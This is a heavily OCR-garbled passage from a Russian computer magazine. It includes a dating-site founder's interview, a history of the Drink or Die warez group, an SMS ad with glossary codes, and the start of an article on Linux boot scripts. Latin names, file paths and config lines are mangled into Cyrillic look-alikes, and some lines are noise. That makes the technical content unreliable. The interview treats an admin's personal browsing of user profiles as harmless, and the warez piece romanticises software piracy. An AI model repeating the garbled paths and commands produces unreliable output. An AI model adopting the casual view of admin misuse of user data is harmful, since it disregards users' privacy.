зывам и мокрым одеждам выходящих подышать дамочадцев, был очень 
хорош. Традиционно работали такие точки, как «Летопись», «Фотоателье», 
«Пирсинг», а «рыцарские бои» снова ждали смелых и отважных. 

В пользу третьего «МЕГАДАМа» еще стоит отнести появление телевизион- 
щиков — невиданное зрелище. 

[знакомство с автором сайта знакомств] Привет! Меня зовут 
Александр Антонов, мне 26 лет, в Сети и на Дамочке известен под ни- 
ком НАМеІІеОМ. 3 года назад у меня появилась идея интернет-версии 
популярной в то время телевизионной игры «Любовь о первого взгля- 
да». Я придумал, каким образом можно перенести правила этой игры 
в Интернет, и вместе с моим другом, гениальным программистом Пав- 
лом Савичем, мы пристулили к реализации проекта. На мне был ди- 
зайн и верстка, он занимался программной частью. В августе 2003 го- 
да сайт Дамочка. РУ открылся для всех пользователей. Сначала на 
нем размещалась только игра «Любовь о первого клика», но очень 
скоро появились и другие разделы. С годами нащи цели не измени- 
лись — мы с самого начала хотели создать популярный молодежный 
ресурс, на котором люди могут приятно провести время, пообщаться 
и познакомиться. При его разработке мы экспериментировали с новы- 
ми веб-технологиями, старались творчески подходить к добавлению 
новых возможностей и функций. Сейчас для меня Дамочка — это от- 
личный способ совместить приятное о полезным, работа, которая од- 
новременно является и увлечением. Кроме этого проекта, я занима- 
юсь некоторыми другими вещами, но на поддержку сіатосііка.ги ухо- 
дит не меньще половины моего рабочего времени. 

На сайте мы проводили общее голосование по поводу того, стоит ли 
вводить жесткую цензуру. Больщинство проголосовало против, поэ- 
тому у нас по-прежнему царит свобода слова и самовыражения. Мо- 
дерация присутствует, но ей подвергаются лищь те дамочадцы, ко- 
торые нарущают законодательство или которые олищком враждебно 
относятся к другим пользователям. Публика на сайте очень разнооб- 
разная. Есть довольно много известных людей. Я лично знаю нес- 
кольких отпрысков известных московских продюсеров, пользовате- 
лей из аппарата Президента России, артистов театра и т.п., которые 
проводят довольно много времени на Дамочке. Многие из них пред- 
почитают не светиться и зачастую не вывешивают свои фотографии 
в анкету. Если я скажу, что, имея полный доступ к базе из 400 тысяч 
зарегистрированных пользователей, я ни разу не воспользовался 
этим в корыстных целях, мне никто не поверит ;). Да, конечно, я 
смотрел анкеты девушек, выбирая по интересующим меня парамет- 
рам — город, возраст, рост и т.п., даже по знаку зодиака и социоти- 
пу! С некоторыми девущками несколько раз встречался, но ни с кем 
длительных отнощений не было. Свою половинку я нашел на Дамоч- 
ке случайно. Когда работал над новой версией ЛПК, зашел на сайт 
и ткнул в одну из недавно завершившихся игр, чтобы взять один из 
элементов оформления результатов игры. В этой игре участвовала 
девушка, фотография которой сразу же привлекла мое внимание. 
Мы с ней вместе уже два года :). 

Планы по развитию сайта глобальные, и мы не успеваем воплощать 
те идеи, которые рождаются во время работы. Тем более, что доб- 
рая половина рабочего времени программистов уходит не на созда- 
ние чего-то нового, а на поддержку уже привычных функций, исп- 
равление багов и латание дыр. Если говорить о планах на отдален- 
ное будущее, я представляю Дамочку максимально интегрирован- 
ной с реальной жизнью. В те прекрасные времена почти все жители 
Земли станут дамочадцами, и Дамочка станет неотъемлемой частью 
их жизни. А пока мы собираемся ввести «связи», которые позволят 
пользователям объединяться в группы по интересам, соц. положе- 
нию и любым другим параметрам. Можно будет создавать клубы и 
кланы о произвольной структурой и правилами. На этом движке бу- 
дут работать контакт-листы, группы «друзей», поиск бывших однок- 
лассников, одногруппников и т.д. 

Многие считают, что Дамочка.ру — строго коммерческий проект из-за 
«различных платных мероприятий». Но платные мероприятия ограничива- 
ются лишь «МЕГАДАМами», которых за все время существования Дамоч- 
ки было всего три. Регулярные тусовки дамочадцев в разных городах орга- 
низуются не администрацией, а энтузиастами из этих городов. Они сами 
выбирают клуб, время проведения вечеринки и прочие условия. Дамочка в 
этих тусовках принимает участие лищь как инструмент для сбора людей по 
интересам и донесения до них информации © 




дамочкин форум 




мастер пирсинга прокалывает 
сосок отважной дамочадке 
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10 лет 

на варезной сцене 

в НАЧАЛЕ 90-х ГГ. СОФТВАРНЫЕ ВЗЛОМЩИКИ 
СТАЛИ ОБЪЕДИНЯТЬСЯ В ГРУППЫ, ДОСТАВАЯ 
ТЕМ ИЛИ ИНЫМ ОБРАЗОМ ЛИЦЕНЗИОННЫЕ 
ПРОГРАММЫ, ОНИ ВСКРЫВАЛИ ИХ ЗАЩИТУ, 
УДАЛЯЛИ ОГРАНИЧЕНИЯ И ВЫКЛАДЫВАЛИ НА 
ВВ8 ИЛИ В СЕТИ ДЛЯ ДАЛЬНЕЙШЕГО РАСПРО- 
СТРАНЕНИЯ. СО ВРЕМЕНЕМ ЭТИ ГРУППЫ СТА- 
ЛИ НАЗЫВАТЬСЯ ѴѴАВЕ2 СЦЕНОЙ. НА ПИКЕ 
РАЗВИТИЯ ВАРЕЗНОГО КОМЬЮНИТИ СУЩЕСТ- 
ВОВАЛО ОКОЛО 10 КРУПНЫХ КОМАНД И СОТ- 
НИ НЕБОЛЬШИХ. НО ДАЖЕ СРЕДИ КРУПНЕЙ- 
ШИХ ВАРЕЗНЫХ БАНД МАЛО, КТО МОГ СРАВ- 
НИТЬСЯ С ОВІМК ОВ СІЕ I тіпсІѵѵОгк (тіпс1ѵѵ0гк@датеіапсі.ги) 

История Огіпк ог Оіе 



[детство Михи] В 1975 г. в небольшой моско- 
вской квартире, в типичной русской семье, ро- 
дился парнишка по имени Миша. Несмотря на 
коммунистические пропаганды вокруг, родители 
воспитали его и старшую сестру в свободной ат- 
мосфере, не травили душу рассказами о Ленине 
и партии. Отец Михи был довольно известным 
ученым и бизнесменом, ему часто приходилось 
ездить за границу в командировки. А поскольку 
командировки эти нередко длились месяцами, 
семью он брал о собой. В 6 лет Миша успел пови- 
дать Германию, Великобританию, Южную Афри- 
ку, Голландию и Турцию. Когда ему исполнилось 
13, семья вернулась в Москву, и парень поступил 
в школу с английским уклоном. 



Шел 1990 г, время, когда в СССР началась перестройка. И время, когда Миша 
впервые познакомился с компьютерами. Возможность быстрого обмена ин- 
формацией по Сети казалась чем-то невероятным, но настоящая страсть про- 
явилась у парня, когда он втянулся в программирование. По его просьбе, отец 
купил компьютер ѴаглаИа МЗХ2, на котором Миша писал свои первые демки 
и игры на бейсике и ассемблере. А спустя два года, у него появился первый 
ІВМ РС, с 286-м процессором, мегабайтом ОЗУ и 40 Мб винчестером. 
Единственным способом получить новые программы был обмен. К 
счастью, у Михи было несколько знакомых о компьютером, через одного из 
них он узнал, что существуют лицензионные программы и пиратские. А в 
качестве примера последних получил пару дискет с так называемым «Ва- 
резом». Многие взломанные программы поставлялись с файлом, в котором 
рассказывалось о том, кто взломал защиту, передавались приветы «еіііе 
ррі» и другие интересные вещи. Все это было безумно интересно и Миха 
загорелся целью узнать как можно больше о варезе и людях, которые за 
ним стоят. Постепенно интерес перерос в нечто большее. В стремление 
стать частью варез сцены. 



[рождение Огіпк ог Оіе] Основными варезными группами начала 90-х бы- 
ли Нагог 1911, ТІте Огеат Теагл, Іпіегпаііопаі Меіѵюгк о1 Сгаскегз, Тгі-ЗІаг НесІ 
Зесіог Іпс., Мокіигпаі Тгабіпд АІІІапсе и ТІте НитЫе Ѳиуз. Миша внимательно 
изучил всю информацию, которая у него скопилась об этих группах. Ему хо- 
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телось не просто вносить какой-то вклад, а повлиять на комьюнити в целом. 
Начал он о написания РРЕ и игровых трейнеров (маленькие програм- 
мки, с помощью которых можно поставить ОосІ-режим или бесконеч- 
ное количество патронов), а первой группой была Тгі-81аг Неб 8ес(ог 
Іпс. И, так как все в группе имели свои псевдонимы, Миха придумал 
себе второе имя — ОеѵіаГог. 

Спустя пару месяцев активной сценовой деятельности, обнаружилось, что 
у парня есть настоящий талант доставать свежие программы из самых раз- 
ных источников. Будь-то фирмы-разработчики, магазины, бета-тестеры, 
трейдеры или просто друзья... Оеѵіаіог'у стекались проги со всех концов 
света, и его частная софтверная коллекция наверняка была самой боль- 
шой в Москве. Так как программистов в Тгі-84аг хватало, Миха стал глав- 
ным поставщиком и трейдером группы, а через пару лет уже был известен 
на всей мировой варез-сцене. 

В апреле 1993 г., на московской квартире, где Оеѵіаіог встречался со свои- 
ми друзьями-кракерами (одним из них был небезызвестный Варітотеі), по- 
явилась идея создания новой группы. Миха к тому времени уже знал все хо- 
ды и выходы на варез-сцене и хотел сделать свой собственный лейбл, быть 
не зависимым ни от кого. Так как приятели, как любой русский человек, лю- 
били пропустить по рюмочке, название стало характерным: Огіпк ог Оіе. 
□еѵіаіог потом признался, что изначально он планировал создать не просто 
группу, а целую андеграундовую компьютерную империю. И даже составил 

план, как воплотить 
грандиозную цель. 
Первые месяцы ООО 
занималась изучением 
сцены и ее представи- 
телей, чтобы занять 
свое место среди аме- 
риканских и европейс- 
ких команд, и соста- 
вить им достойную кон- 
куренцию. Летом 1993 
г. Миха сменил ник на 
Лтту Затех — именно 
под этим именем все 
следующие годы он 
был известен на миро- 
вой крак-сцене. 

[первые годы ООО] 

Первым официальным 
релизом ООО стал вы- 
пущенный в мае 93-го 
крак для популярного 



пакета ВВ8 РСВоагб. Большинство авторитетных крак-групп в то время 
специализировались на создании разнообразных РРЕ (Раскеі Ргосеззіпд 
Епдіпе) для РСВоагб. Это могли быть вариации интерфейса ВВ8 или по- 
лезные утилиты для админов. Успешные РРЕ-программисты считались 
той самой недосягаемой для простых смертных элитой. Вгіпк ог Оіе не 
стала исключением и спустя короткое время превратилась в одну из са- 
мых активных РРЕ групп. 

Сначала ООО являлась исключительно русской командой. Лтту сплотил 
вокруг себя своих друзей, многих из которых знал лично. Все изменилось 
к концу 1993 г. Миха понял, что для дальнейшего развития нужно строить 
партнерские отношения о зарубежными сценерами. И первыми, с кем он 
наладил контакты, стали датская 8іІѵегабо ВВ8 и немецкая Оагкпезз ВВ8. 
Эти ноды были первыми распространителями релизов ООО в Европе, и 
именно через них о группе узнал весь мир. 

Помимо РРЕ-проектов, ООО специализировалась на трейнерах к компью- 
терным играм. Вместе о ТН8І, она впервые представила чит-опции, встро- 
енные в игровое меню (обычно они были или в загрузчике, или поставля- 
лись отдельной программой). 

Трейдерские таланты Лтту Затех'а питали группу непрерывным притоком све- 
жего ПО. Лидер ООО и его близкие друзья были постоянными посетителями ле- 
гендарных кракерских борд Мігаде, Ѳаіез о1 Аздагб, Опіаѵѵіиі Епігу, где общались 
о «элитой» и обменивались варезом. Вместе с репутацией, росла и численность 
группы. Всего за год из небольшой кучки риаллайфовых приятелей, Огіпк ог Оіе 
превратилась в одну из крупнейших команд на варез-сцене, с более 60 активных 
мемберов. Это не значит, что в группу принимали всех без разбора. Наоборот, 
правила приема были очень строгими и практически всегда в устоявшийся кол- 
лектив брали только давних друзей, хорошо зарекомендовавших себя на варез 
сцене. По сути ООО являлось своеобразной семьей, закрытой для посторонних, 
но дружественной для «своих». Группа была полностью самодостаточной и 
практически не пользовалась чужими услугами. Только внутренние поставщики, 
и только свои РТР и сайты для распространения релизов. 

[выход в Сеть] В середине 1994 г. Лтту Затех и его друг АЬЬоІ Оегѵізіі 
впервые открыли для себя интернет. Парни посерфили сайты, прошлись по 
фтп, посетили андеграундовые ІРІС каналы... было очевидно, что за сетью 
будущее. И будущее ООО должно быть неразрывно связано о интернетом. 
Первым делом, Миха создал в ІРІС свой канал, открытый для посторонних, но 
известный только в узком кругу. Вторым этапом стал практически полный пе- 
реход на распространение релизов через сеть. В начале 1 995 г. было немно- 
го варезников, которые освоили интернет и использовали его в работе. Боль- 
шая часть Краков по прежнему ходила через андеграундовые борды. Так как 
□00 стали, по сути, пионерами в этом, им удалось забрать под себя всех луч- 
ших поставщиков и захватить внимание первых сетевых пользователей. 
Лтту 4атех был очень осторожен в ведении всех дел. Несмотря на то, что он 
жил в России, где не было законов о софтварном пиратстве, парень никогда не 
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идет процесс взлома 



для многих в ООО история закончилась здесь 



держал взломанные программы на своем компьютере. Также в качестве прик- 
рытия, он зарегистрировал частную фирму, производящую лицензионный софт. 

1995 г. стал переломным для состава группы. Огіпк ог Оіе оставили несколь- 
ко давних мемберов, чтобы основать свою под названием Ргорітесу. В то же 
время, другой русский парень с ником РИоепіх, лидер крак-тимы Тугаппу, 
предложил Лгпту объединить их группы для более плодотворной работы. 
Результатом этого слияния стала серия Краков программ от ІВМ, МісгозоП и 
МоѵеІІ. Эти релизы быстро разошлись по всему миру, и Огіпк ог Оіе стала но- 
мером один на варезной сцене. О ООО заговорили даже далекие от компь- 
ютеров люди, после того, как команда выпустила взломанную версию 
\Л/іпсіо\л/з 95 за две недели до официального релиза. Этот инцидент долго 
обсасывался в прессе и лейбл ООО афишировался на каждом углу. Более 
380 релизов и 3 Гб софта всего за один 1 995-й год — ни одна другая коман- 
да не могла сравниться с ООО по активности. Но, начиная с 1996 г., для 
Огіпк ог Оіе, как и для всей остальной сцены, начались не лучшие дни. 

[время перемен] Когда интернет стал открытым для всех, андеграунд начал 
стремительно меняться. Первые изменения стали заметны в ІНС, каналы кото- 
рого были зафлужены толпами ламеров, не имеющих никакого представления 
о сцене. В то же время, появилось большое количество новых крак-групп, ре- 
гулярно выпускающих краки, серийники, трейнеры и другие подобные вещи. 
Поддерживать репутацию лучших в своем роде стало сложно — релизы от 
ООО попросту утонули в общей массе. Лидеры Оппк ог Оіе Зітту Затег и 
СуЬег Апдеі оставили сцену, чтобы профессионально заняться веб-дизайном, 
на их место пришел новый предводитель — Гезіег. Понадобилось несколько 
месяцев, чтобы переформировать команду и сохранить то, что осталось. Мно- 
гие начали поговаривать о конце эпохи ООО, но благодаря энтузиазму Безіег'а, 
группа продолжала работать, хоть и не так активно, как раньше. 

В Огіпк ог Оіе была четкая инфраструктура, где каждый занимался своим делом. 
Поставщики (курьеры) добывали ПО и передавали его кракерам. Кракеры взла- 
мывали защиту, вносили необходимые изменения в код и отправляли результат 
тестерам. Те проверяли взломанные проги на профпригодность, после чего софт 
попадал в руки упаковщиков, распространяющих его через сайты, РТР и ІНС. 

1 996 год стал временем первых арестов кракеров и кардеров. Компания АОБ, 
которая больше всего страдала от компьютерных махинаций (первые амери- 



первый компьютер Оеѵіаіог'а 



канские интернет-юзеры не заботились о создании 
нормальных паролей и их аккаунты легко подбира- 
лись, как в прочем и номера кредитных карт), об- 
ратилась в полицию и на территории США нача- 
лись рейды. В результате было задержано нес- 
колько особо зарвавшихся кардеров, хотя многие 
из них легко отделались. 

В середине 1 996 года в Огіпк ог Оіе вернулись ос- 
новные поставщики и талантливые кракеры: Тііе 
Рер, Таѵѵпі, Еѵіі Теа, Тііе Рипізііег. После этого объединения, ООО стала быст- 
ро набирать былую силу и к зиме снова заняла лидирующее место в варез- 
ных чартах. В феврале 1 997 г. группа за один месяц выпустила 54 крупных 
релиза общих объемом 890 Мб. А в 1999 г. самым известным релизом ООО 
стал ОѴО Зрееб Віррег — взломщик защитного кода от копирования ОѴО. Он 
появился незадолго до ОеСЗЗ, аналогичной программы от норвежского кра- 
кера Йона Йохансена, но получившей большую известность. 

[аресты и суды] В 2001 г. координированием ООО занимались двое ли- 
деров, один в США, другой — в Австралии, а мемберами ее были лучшие 
в мире кракеры, включая Оеггу, РогсеКІІІ и Наскгаі. Сеть поставщиков сос- 
тояла из сотен работников софтварных компаний, которые высылали ко- 
пии программ задолго до их появления в продаже. Механизм был отлажен, 
и ничего не предвещало беды. А тем временем ФБР совместно с правоох- 
ранительными органами шести стран готовилось к проведению масштаб- 
ного рейда, ставшего впоследствии известным как операция Виссапеег. 

1 1 декабря 2001 г. федеральные агенты посетили Массачусетский Технологичес- 
кий институт, Калифорнийский университет. Университет Оригоны, а также офи- 
сы несколько софтварный компаний — в этих местах учились или работали самые 
активные мемберы Оппк ог Оіе. Помимо Америки, рейды прошли на территории 
Великобритании, Австралии, Финляндии, Норвегии и Швеции. В один единствен- 
ный день, подготовка к которому длилась 14 месяцев, полиции удалось арестовать 
почти всю «элиту» варез сцены, ключевых мемберов ООО, Нахог 91 1 , ОЕѴІАМСЕ, 
ВодиеѴѴаггіогг, ТРЕ, ѴѴЕѴѴ, РІІЗС и других известных варез/крак групп. Более 70 че- 
ловек, из которых около 20 имело отношение к ВОВ, обвинили в нарушении авто- 
рских прав. Судебные процессы над кракерами начались во всем мире. 

В итоге самый суровый приговор был вынесен 28-летнему Джону Санкусу, на 
тот момент одному из лидеров Вгіпк ог Віе. Он получил 4 года тюрьмы. «Джон 
Санкус со своей технобандой ворочал темными делами в интернете, полагая, 
что их никогда не поймают. Ріо оказался не прав. Заслуженное наказание пос- 
лужит ему уроком, и примером для других подобных технозлодеев, уверенных 
в своей неуловимости», — выступил с назидательной речью прокурор. 
Сильно досталось мемберам ВОВ из Великобритании, для поимки которых 
местные органы власти потратили немало сил. Судебные процессы над 
Алексом Беллом ака Мг 2940 и Стивеном Доудом ака Тігп, ключевыми пос- 
тавщиками группы, освещались во многих британских газетах и в Сети. 
В итоге их признали виновными в распространении пиратской продукции и 
приговорили к срокаму от 1 .5 до 2.5 лет тюрьмы. 

Большинство арестованных мемберов Вгіпк ог Віе имели высокооплачи- 
ваемую работу в сфере ІТ и занимались краком не ради денег. Все они 
руководствовались старым добрым принципом 4из1 Іог Рип. Взлом защи- 
ты программ был интеллектуальным состязанием, проверкой собствен- 
ных скипов, а не способом заработать. 

Тебе, наверное, интересно, что случилось с ВОВ потом, когда отгреме- 
ли рейды? Ріекоторое время группа еще работала, но уже намного ти- 
ше и осторожнее. Так как весь костяк команды отбыл в места не столь 
отдаленные, координировать механизм стало некому и оставшиеся 
мемберы просто ломали себе потихоньку, выпуская релизы под лейб- 
лом ВОВ. Последние упоминания о группе относятся к январю 2003 г., 
когда в Сети появилась взломанная версия ЗВ Зіибіо Мах ѵЗ.1, и в ин- 
фошке к которой стояли три знакомые всем варезникам буквы. Ріа 
этом история легендарной команды закончилась. Кто-то из мемберов 
перешел в другие команды, кто-то навсегда оставил сцену. Ріо и те, и 
другие с ностальгией вспоминают о временах, когда Вгіпк ог Віе рули- 
ла варез сценой © 











Хочешь фирменный лого на свой сотовый? 

Пришли код логотипа (к примеру, "1001") на номер 4446 . ^ 



Хочешь узнать, что значит термин? 



Пришли код термина (к примеру, "ѵѵОООГ') на номер ‘ 



■^1 








идентификатор 



брандмауэр 



кеилоггер 



отладчик 

эмулятор 



редирект 



оболочка 



мультифид 



модератор 



фЛѲИМ 



сплиттер 



(код ѵѵОООІ) 


маршрутизация] 


(код «0077) 


(код «0002) 


шина 


(коф«Ѳ078) 


(код ѵѵОООЗ) 


интерпретатор] 


(код «0079) 


(код «0004) 


окружение |н 


(код «0080) 


(код «0005) 


кластер 


(код «0081) 


(код «0006) 


степпинг 


(кодтѵОѲвв) 


(код «0007) 


традрик 


(код «0089) 


1 (код «0008) 


транслятор 


(код «0092) 


Г(код «0009) 


верификатор^! 


(код «0093) 


■(код «0010) 


спам 


(коф«вѲ94) 


(код «ООН) 


Офшор 


(код «0095) 


(код «0012) 


крякер 


(код «0096) 


(код «0013) 


бета 


(код «0097) 


Шод «0014) 


скин 


(кодч»вв98) 


■код «0015) 


сертификация^ 


(код «0099) 


І&д «0016) 


аутсорсинг 


(код «0100) 


'(код «0010 


оаннер 


1 (код «0101) 


(код «0018) 


локализация 


1 (код «0102) 


(код «0019) 


тестер 


(код «0103) 


(код «0020) 


дамп 


(код «0104) 


(код «0021) 


стек 


(код «0105) 


(код «0022) 


исключение 


(код «0106) 


(код «0023) 


мидлет 


(код «0107) 


(код «0023) 


оофускатор 


(код «0108) 


(код «0025) 


документациям 


(код «0109) 


(код «0026) 


поток 


(коділЮНѲ) 


(код «0027) 


хэшированиеН 


(кодттѲІІІ) 


(код «0028) 


ораузер ^! 


(код «0113) 


1(код «0029) 


инсталятор 


(код «0114) 


[(Лод «0030) 


реестр 


(код «0115) 


1(код «0038) 


аккаунт 


(код «0116) 


^од «0040) 


домен 


(код «0117) 


(код «0041) 


девелопер 


(код «01181 


(код «0042) 


флуд Щ 


(коф«еі19) 


(код «0043) 


пиктограммами 


(кодт?0120) 


(код «0044) 


архиватор 


(код «0121) 


(код «0045) 


экспозиция 


(код «0128) 


(код «0047) 


стробоскоп ^! 


(код «0129) 


(код «0048) 
(код «0049) 




(код «0130) 
(код «0131) 


(код «0050) 


шлюз 


(код «0132) 


(код «0051) 


шелл 


(код «0133) 


(код «0052) 


блог ^! 


(код-«Ѳ134) 


(код «0053) 


оэкап 


(код «0135) 


(код «0054) 


декодирование! 


(код «0136) 


(код «0055) 


локалка ШШ 


(код «0137) 


(код «0056) 


бэкдор ^! 


(код «0138) 


(код «0057) 


хомпага 


(код «0139) 


(код «0058) 


сессия 


(код «0140) 


(код «0059) 


авторизация^І 


(код «0141) 


(код «0060) 


топик 1^1 


(код «0142) 


(код «0061) 


профипь 


(код «0143) 


(код «0062) 


сегмент 


(код «0144) 


(код «0063) 


ЛИСТИНГ 


(код «0145) 


(код «0064) 




(коф«Ѳ146) 


(код «0065) 


свитч 


(код «0147) 


(код «0066) 


спуфинг 


(код «0148) 


(код «0067) 


ФРИКИНГ 


(коф«Ѳ149) 


(код «0068) 


крэкинг 


(код «0150) 


(код «0069) 


сиквел 


(код «0151) 


(код «0070) 


ретранспяторШ 


(код «0152) 


(код «0071)- 


коммутатор ' 


(код «0153) 


(код «0072) 


аттач 


' (код «0154) 


(код «0073) 


плагин 


(код «0155) 


(код «0074) 


регистр 


(код «0156) 


(код «0075) 


протокол 


(код-«0076) 









Пришли свои термины на номер 4445 в виде 98 
кегшіпі (например "98 баг"). Не более 160 
символов латиницей или 70 кириллицей. 



Подробности: ѵѵш.і-ігее.ги, (095) 916-7253, (812) 118-4575, зиррогШІ-Ігее.ги. Для заказа картинок включи услугу №АР/0РР5-доступа в Интернет (оплачивается 
согласно твоему тарифному плану). Проверить возможность закачки можно, зайдя на ѵѵар-сайт 1іНр://4446.ги. В случае ошибки уточни настройки в службе 
поддержки твоего оператора. Стоимость запроса на номер 4444 - $0,30 без учета налогов, на номер 4445 - $0,60 без учета налогов, на номер 4446 - $0,90 без 
учета налотов, на номер 4449 - $3,00 без учета налотов. В случае ошибочното запроса услуга считается оказанной. 
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Познай свою ОС 

ты НИКОГДА НЕ ЗАДУМЫВАЛСЯ НАД ТЕМ, ЧТО 
ПРОИСХОДИТ С ТВОИМ ЛЮБИМЫМ ПИНГВИ- 
НОМ во ВРЕМЯ ЗАГРУЗКИ? КАКИЕ ДЕЙСТВИЯ 
ПРЕДПРИНИМАЕТ СИСТЕМА ДЛЯ ТОГО, ЧТОБЫ 
ТЫ БЕЗ ЛИШНИХ УСИЛИЙ СМОГ СМОТРЕТЬ 
ФИЛЬМЫ, СЛУШАТЬ МУЗЫКУ, ОБЩАТЬСЯ В ІВС 
И ВООБЩЕ РАБОТАТЬ С ОПЕРАЦИОННОЙ СИС- 
ТЕМОЙ? ОТВЕТЫ НА ЭТИ ВОПРОСЫ ТЫ НАЙ- 
ДЕШЬ В этой СТАТЬЕ I І1т ()1т@Ііз{.ги) 

Процесс загрузки Уіпих 
в подробностях 



[пролог] Как известно, процесс загрузки опе- 
рационной системы начинается с загрузчика 
(ІІІо или дшЬ), которому передает управление 
ВЮЗ материнской платы. Загрузчик в свою 
очередь подгружает в память образ ядра, нахо- 
дящийся в каталоге /ЬооГ, и предоставляет ему 
все полномочия. Ядро проводит многочислен- 
ные тесты и инициализации, активирует драй- 
вераы и запускает процесс іпИ (РЮ = 1). После 
этого ядро уже не способно контролировать 
дальнейшую загрузку, и вся ответственность 
ложится на плечи іпіі. 




Система исіеѵ только недав- 
но начала использоваться в 
ипих. До этого был беѵ(з, 
который, в отличие от ибеѵ, 
находился в ядре. 



[ІПІІ: глава семейства] Задача 
ІПІІ — запуск стартовых скриптов, ко- 
торые как раз и отвечают за после- 
дующие действия по загрузке ОС, 
проверку файловых систем, подня- 
тие сетевых интерфейсов, запуск де- 
монов и т.д. Получив абсолютную власть, іп№ первым делом читает свой кон- 
фиг /еГсУ/гаТГаЬ, чтобы узнать о дефолтном уровне запуска и о том, на какие 
именно скрипты следует возложить бразды управления загрузкой. 

Уровни запуска іпіі: 



ГО Выключение. 

Ш Однопользовательский режим. 

[з] Многопользовательский режим без сети. 

0 Многопользовательский режим. 

[О Не используется. 

[т] Многопользовательский режим, плюс запуск Х-\Л/іпсІоѵѵ. 
[Ш Перезагрузка. 





Р [)ПШ4Р ІМ ПІІ 1*1 Ек 4 'а- 
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ІІГІІВрРЛІІТ' ІІС'П .І'П.'І 

р 'кгівг IV ГѴ1 ч(чп іріч іііпі* иѵ Iгѵ•|г^т^ іг. 
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Р ІГ*І № Ді #*п і*ЫІ„ 



/е(о/іпіМаЬ из ЗІаскѵѵаге 10.1 



Для примера рассмотрим файл /еІс/іпіНаЬ из ЗІаскѵѵаге 10.1. Строка 
”ісі:3:іпі(сіе1аиІ1:" устанавливает третий уровень запуска. Следующая запись 
"зі:3:зузіпі1:/е1с/гс.сІ/гс.З" означает, что скрипт /еІс/гс.сі/гс.З должен грузить- 
ся первым, вне зависимости от уровня запуска. Далее по тексту можно най- 
ти строку "гс:2345:ѵѵаі1:/е1о/гс.сІ/гс.М", говорящую о том, что для уровней со 
второго по пятый следует запустить скрипт 7е1с/гс.сІ/гс.М". 

[ЗузІешѴ ѵ5 В80] Различают два типа стартовых скриптов: ЗузІетѴ и 
ВЗО. Первые применялись в оригинальном ЫМІХ, а вторые в системах се- 
мейства ВЗО. Различия между ними довольно существенные. ЗузІетѴ- 
скрипты делают процесс инициализации более гибким, поддающимся наст- 
ройке, зато ВЗО-скрипты отличаются своей простотой (хотя в современных 
ВЗО по гибкости и удобству настройки даже опережают ЗузІетѴ-скрипты). 
Изначально (на заре появления 386В30) ВЗО-скрипты представляли собой 
семь файлов {/еІс/гс.О — гс.6), каждый из которых отвечал за инициализа- 
цию на одном из семи уровней запуска. Начальной инициализацией зани- 
мался скрипт /еГс/гс.зуз/М (или просто /еіс/зувіпіі). В настоящее время та- 
кую схему загрузки (в несколько потрепанном виде) можно встретить в 
кіпих дистрибутивах ЗІаскѵѵаге и СНУХ. В современных же ВЗО-системах 
используются иные скрипты, которые унаследовали от своих предшествен- 
ников только основную идею. В общем виде эти скрипты выглядят так: 

[схема инициализации В80] 

/еіс/зузіпіі — скрипт начальной инициализации 
/еіс/гс — отвечает за инициализацию на уровнях 2 — 5 
/еІс/гс.зІшМошп — отвечает за инициализацию на уровнях 0, 1 и 6 
/еіс/гс. сопі — конс()игурационный файл 
/еіс/гс. ІосаІ — запуск команд пользователя 

Внося изменения в конфиг, можно контролировать запуск сервисов, ме- 
нять шрифты и раскладку клавиатуры. 

В противоположность монолитным ВЗО-скриптам, ЗузІетѴ-скрипты предс- 
тавляют собой огромное количество различных сценариев, задача каждо- 
го из которых — выполнить один шаг инициализации (например, подклю- 
чить зѵѵар, запустить зепбтаіі, установить шрифт). Все сценарии лежат в 
каталоге /е1с/гс.с///п;?.сІ, помимо него в/еіс/гс.сі присутствуют еще восемь ка- 
талогов: гсО.Ц — гсб.сі и гсзузіпК.сі. Их имена соответствуют уровням запус- 
ка. В каждом из них создаются символические ссылки, указывающие на 
сценарии каталога /еіс/гс.сі/іпіі.сі. Имя ссылки может начинаться с буквы 3 
(запустить сервис) или К (остановить сервис). Затем идут две цифры, обоз- 
начающие порядок, в котором следует запускать скрипты. К примеру, если 
в гсЗ.Ц присутствуют ссылки ЗІОзузкІодЦ и Зібсгоп, то это значит, что на 
третьем уровне запуска следует сначала выполнить скрипт 
/еіс/гс.сі/іпіі.сі/вузіодсі, а затем /еіс/гс.сі/іпіі.сі/сгоп. Каждому из них будет пе- 
редан параметр зіагі. Довольно часто в системах со стилем инициализации 
ЗузІетѴ присутствует каталог /еіс/вузсопіід, содержащий конфигурацион- 
ные файлы, о помощью которых можно влиять на процесс загрузки. 

[что скрипты нам готовят] Перед тем, как продолжить нашу эпопею, 
хочу обратить твое внимание на важную деталь. Так как стартовые скрипты 
представляют собой сценарии командного интерпретатора, значит, уже в 
момент загрузки появляется необходимость в Ьазіт — это первое. Второе, 
скрипты не могут обходиться только встроенными средствами ЬазЦ, и им 
нужны стандартные команды типа: са(, есЬо, Ьозіпате, гт, ипате. Все эти 
базовые программы, а также множество других содержится в пакете согеиіі- 
Із. Также для приведения системы в рабочее состояние скрипты не могут 
обойтись и без сервисных утилит (Иѵѵсіоск, тоипі, зѵѵароп и т.д.). Такие ути- 
литы входят в состав пакета иІІІ-Ііпцх, который включает в себя беспорядоч- 



ную смесь различных, не связанных между собой программ (тоге и саі на- 
ходятся именно в нем). Прибавь сюда программы обработки текста зеЦ и 
аѵѵк и поймешь, что уже на этапе инициализации появляется необходимость 
во многих стандартных программах. Причем все они должны находиться в 
каталогах /Ып и /вЫп, потому что файловая система, в которой содержится 
/изг, может быть не смонтирована на начальном этапе загрузки. 

[магия инициализации] Настало время перейти непосредственно к опи- 
санию процесса загрузки. Чтобы никого не обидеть, возьмем для примера 
скрипты из нейтрального дистрибутива ЦРЗ :). Его стартовые скрипты пре- 
дельно просты и относятся к классу ЗузІетѴ. Итак, давай подумаем логичес- 
ки, что нужно сделать на начальной ступени инициализации (той, которая не 
зависит от уровня запуска). А сделать нужно следующее (по приоритету): 

Ш Примонтировать ядерные файловые системы /ргос и /зуз, иначе без них 
мало что будет работать. 

[1] Инициализировать систему иЦеѵ, которая занимается созданием эле- 
ментов в каталоге /сіеѵ. 

[з] Подключить зѵѵар, куда же без него. 

0 Загрузить модули, так как поддержка некоторых ФС может находиться 
в модулях — это нужно сделать до их проверки и монтирования. 

0 Проверить файловые системы на наличие ошибок. 

[б] Примонтировать все локальные ФС. 

0 Очистить каталоги Лтр, /ѵаг/гцп и им подобные от временных файлов. 

[в] Установить системное время. 

[1] Установить нужный консольный шрифт и раскладку клавиатуры. 

@ Поднять интерфейс обратной петли. 

